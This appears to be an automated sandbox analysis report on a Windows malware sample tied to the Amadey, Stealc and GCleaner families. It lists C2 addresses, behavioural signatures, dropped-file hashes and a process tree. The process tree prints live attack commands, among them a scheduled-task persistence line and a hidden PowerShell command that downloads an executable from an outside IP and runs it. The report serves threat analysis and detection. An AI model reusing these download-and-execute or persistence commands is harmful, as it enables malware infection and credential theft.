Analysis

  • max time kernel
    116s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/02/2025, 21:55

General

  • Target

    a23f9804f5071b533be4df6a8b61a51c9bdc9e5af949d09cfa0dc5e03ae43865N.exe

  • Size

    938KB

  • MD5

    99b84616cbcde939a5b004797acee9c0

  • SHA1

    f6d0aca7caf4dc3e52fc3177f74159e302512418

  • SHA256

    a23f9804f5071b533be4df6a8b61a51c9bdc9e5af949d09cfa0dc5e03ae43865

  • SHA512

    f3fcb2e1460d7f5932aac997331e8b366f34e7a6220505f1ca11156d1ba14172ad50f1fb250e57f8aff3412b85b94a46046351d1b6da3b09401b74660471af56

  • SSDEEP

    24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8ay8F:mTvC/MTQYxsWR7ay8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 12 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a23f9804f5071b533be4df6a8b61a51c9bdc9e5af949d09cfa0dc5e03ae43865N.exe
    "C:\Users\Admin\AppData\Local\Temp\a23f9804f5071b533be4df6a8b61a51c9bdc9e5af949d09cfa0dc5e03ae43865N.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4896
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn xoBmomafQLG /tr "mshta C:\Users\Admin\AppData\Local\Temp\dXeJ8ek7B.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3832
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn xoBmomafQLG /tr "mshta C:\Users\Admin\AppData\Local\Temp\dXeJ8ek7B.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4352
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\dXeJ8ek7B.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4920
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9W6KHXCK4Y2OFDLMJD3ISX7I8LC67SYI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4704
        • C:\Users\Admin\AppData\Local\Temp9W6KHXCK4Y2OFDLMJD3ISX7I8LC67SYI.EXE
          "C:\Users\Admin\AppData\Local\Temp9W6KHXCK4Y2OFDLMJD3ISX7I8LC67SYI.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1536
            • C:\Users\Admin\AppData\Local\Temp\1091788001\356cd740af.exe
              "C:\Users\Admin\AppData\Local\Temp\1091788001\356cd740af.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4948
            • C:\Users\Admin\AppData\Local\Temp\1091813001\f3719e499f.exe
              "C:\Users\Admin\AppData\Local\Temp\1091813001\f3719e499f.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3972
            • C:\Users\Admin\AppData\Local\Temp\1091814001\9c89e13e66.exe
              "C:\Users\Admin\AppData\Local\Temp\1091814001\9c89e13e66.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3664
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:2320
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb6673cc40,0x7ffb6673cc4c,0x7ffb6673cc58
                  8⤵
                    PID:3936
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1992,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:2
                    8⤵
                      PID:2204
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1888,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:3
                      8⤵
                        PID:3776
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8
                        8⤵
                          PID:4656
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:4696
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:2352
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4480 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:3604
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4520,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4260 /prefetch:8
                          8⤵
                            PID:3464
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
                            8⤵
                              PID:2232
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4820,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4896 /prefetch:8
                              8⤵
                                PID:3972
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4180,i,10510044615683139676,5537955972942004499,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4952 /prefetch:8
                                8⤵
                                  PID:4872
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                7⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:4052
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb667446f8,0x7ffb66744708,0x7ffb66744718
                                  8⤵
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3600
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
                                  8⤵
                                    PID:936
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                                    8⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2120
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                                    8⤵
                                      PID:4484
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:4424
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:4920
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:2164
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2100,16606702605788248970,5867287207321939730,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:3604
                                • C:\Users\Admin\AppData\Local\Temp\1091815001\2b6b11369f.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091815001\2b6b11369f.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1740
                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    7⤵
                                    • Downloads MZ/PE file
                                    • System Location Discovery: System Language Discovery
                                    PID:1800
                                • C:\Users\Admin\AppData\Local\Temp\1091816001\bc8b02db62.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091816001\bc8b02db62.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4932
                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    7⤵
                                    • Downloads MZ/PE file
                                    • System Location Discovery: System Language Discovery
                                    PID:1656
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5056
                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                        1⤵
                          PID:2620
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                          1⤵
                            PID:448
                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                            1⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2996

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\mozglue.dll

                            Filesize

                            593KB

                            MD5

                            c8fd9be83bc728cc04beffafc2907fe9

                            SHA1

                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                            SHA256

                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                            SHA512

                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                          • C:\ProgramData\nss3.dll

                            Filesize

                            2.0MB

                            MD5

                            1cc453cdf74f31e4d913ff9c10acdde2

                            SHA1

                            6e85eae544d6e965f15fa5c39700fa7202f3aafe

                            SHA256

                            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                            SHA512

                            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                            Filesize

                            649B

                            MD5

                            4004aa0284e9ac374af76b31b2a746dd

                            SHA1

                            1aff57edd8c602d4f9b652e2bb5a9332a2622f54

                            SHA256

                            cceb262367cec08da14c2ffe9b904e8bd91327df8f7cc885d2d8afcb7f8a276e

                            SHA512

                            81df0f1e438f4a407887d247e47d95adb9754ac04f1c25f44467f3fcb099be445a479e9d7b6e0c53378b5bf9a5ca5db9339c50d6957ae69406281369e4b941e6

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                            Filesize

                            2B

                            MD5

                            d751713988987e9331980363e24189ce

                            SHA1

                            97d170e1550eee4afc0af065b78cda302a97674c

                            SHA256

                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                            SHA512

                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            93be3a1bf9c257eaf83babf49b0b5e01

                            SHA1

                            d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a

                            SHA256

                            8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348

                            SHA512

                            885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            6738f4e2490ee5070d850bf03bf3efa5

                            SHA1

                            fbc49d2dd145369e8861532e6ebf0bd56a0fe67c

                            SHA256

                            ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab

                            SHA512

                            2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

                            6KB

                            MD5

                            ace5432250f032b56ad8440602fd319d

                            SHA1

                            e7520ac4dff18898ca71d175845c4e04cd642090

                            SHA256

                            6605e5946c82f298d2706d48377e75cd8609cf747946d5106297b1a1aebcf9cd

                            SHA512

                            6411b9a32a6aaed408eb566089c7987ed43175f5384e0866cb6495b7de4b4225d6cefa2c5790b72f1dbb263ae07c779276a0c593fcb552d0ad52b9b21185df6f

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H2Y9DKVI\service[1].htm

                            Filesize

                            1B

                            MD5

                            cfcd208495d565ef66e7dff9f98764da

                            SHA1

                            b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                            SHA256

                            5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                            SHA512

                            31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MGQ8IQ23\soft[1]

                            Filesize

                            987KB

                            MD5

                            f49d1aaae28b92052e997480c504aa3b

                            SHA1

                            a422f6403847405cee6068f3394bb151d8591fb5

                            SHA256

                            81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                            SHA512

                            41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                          • C:\Users\Admin\AppData\Local\Temp9W6KHXCK4Y2OFDLMJD3ISX7I8LC67SYI.EXE

                            Filesize

                            3.1MB

                            MD5

                            d433e1dc943e6ea29d67cf72d2f6fecd

                            SHA1

                            9964aa3e596d93673c4d84695dc94d6f1a9766cd

                            SHA256

                            a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5

                            SHA512

                            caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

                          • C:\Users\Admin\AppData\Local\Temp\1091788001\356cd740af.exe

                            Filesize

                            429KB

                            MD5

                            a92d6465d69430b38cbc16bf1c6a7210

                            SHA1

                            421fadebee484c9d19b9cb18faf3b0f5d9b7a554

                            SHA256

                            3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77

                            SHA512

                            0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

                          • C:\Users\Admin\AppData\Local\Temp\1091813001\f3719e499f.exe

                            Filesize

                            3.0MB

                            MD5

                            5e79df97975b488e901487db545d5de8

                            SHA1

                            2cc617e5bd4cf348b8a1fccf2716686cf2c63fe6

                            SHA256

                            aa38c813aafc36532f6d8e826f2f7665b26c2c0ef2ff7395c21230f2640cb966

                            SHA512

                            5bbfee010c11ba03ef2db2a7a0280aae19f94aced5b2bb2085d5ea97a5d321d89368912cf8d563cbeb7de0f755ef5990adf9199b5f172d115bdc6e6e4442571f

                          • C:\Users\Admin\AppData\Local\Temp\1091814001\9c89e13e66.exe

                            Filesize

                            1.7MB

                            MD5

                            847574da42ba3d0640c821e8eb11e286

                            SHA1

                            f63a12f36991a1aab0b0cfa89e48ad7138aaac59

                            SHA256

                            b730e010dc5deb7b1e33bc057ec8839e99c7943f136f4fe0a20b3a6d4d628202

                            SHA512

                            edff0a63a03d94684a695a57b10fc956792014dbcd31fe295dfca5ee19411e367d2129740157fc1c816e5890d736d53b4c81980de1faa1a7cf70f985f78325b1

                          • C:\Users\Admin\AppData\Local\Temp\1091815001\2b6b11369f.exe

                            Filesize

                            4.5MB

                            MD5

                            272ccd3faec29d650856789f8ff88d36

                            SHA1

                            466906dbe7d68b174cd363d43fdb5d987f341a21

                            SHA256

